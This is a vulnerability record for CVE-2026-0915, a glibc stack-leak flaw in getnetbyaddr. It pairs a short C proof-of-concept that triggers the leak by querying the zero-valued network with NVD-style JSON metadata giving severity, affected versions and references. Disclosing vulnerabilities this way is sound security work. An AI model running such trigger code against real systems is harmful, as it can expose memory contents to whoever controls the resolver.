CVE-2026-0915

#include <netdb.h> #include <stdio.h> #include <stdlib.h> int main() { struct netent *result; struct netent result_buf; char buffer[8192]; int h_errno_val; int ret; // Trigger the vulnerability by querying zero-valued network // This will leak stack contents through DNS backend printf("Triggering CVE-2026-0915 - getnetbyaddr stack leak\n"); printf("Querying network with address type AF_INET\n"); // Query for network 0.0.0.0 (zero-valued network) // In affected glibc versions, this may leak stack contents result = getnetbyaddr(0, AF_INET); if (result != NULL) { printf("Network found: %s\n", result->n_name); } else { printf("Network not found (h_errno: %d)\n", h_errno); } // Alternative: using getnetbyaddr_r for thread-safe version printf("\nUsing getnetbyaddr_r (thread-safe version):\n"); ret = getnetbyaddr_r(0, AF_INET, &result_buf, buffer, sizeof(buffer), &result, &h_errno_val); if (ret == 0 && result != NULL) { printf("Network found: %s\n", result->n_name); } else { printf("Query failed with error code: %d\n", h_errno_val); } printf("\nNote: In vulnerable versions, stack contents may be leaked\n"); printf("through DNS queries to configured resolvers.\n"); return 0; }

{"cve": {"id": "CVE-2026-0915", "sourceIdentifier": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "published": "2026-01-15T22:16:12.457", "lastModified": "2026-01-23T19:36:50.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Calling getnetbyaddr or getnetbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend for networks and queries for a zero-valued network in the GNU C Library version 2.0 to version 2.42 can leak stack contents to the configured DNS resolver."}, {"lang": "es", "value": "Llamar a getnetbyaddr o getnetbyaddr_r con un nsswitch.conf configurado que especifica el backend DNS de la biblioteca para redes y consulta una red con valor cero en la GNU C Library versión 2.0 hasta la versión 2.42 puede filtrar el contenido de la pila al resolvedor DNS configurado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndIncluding": "2.42", "matchCriteriaId": "45D5C7C8-E53C-4AA3-97A6-1DFCBE5ED529"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33802", "source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "tags": ["Broken Link"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/16/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33802", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Broken Link"]}]}}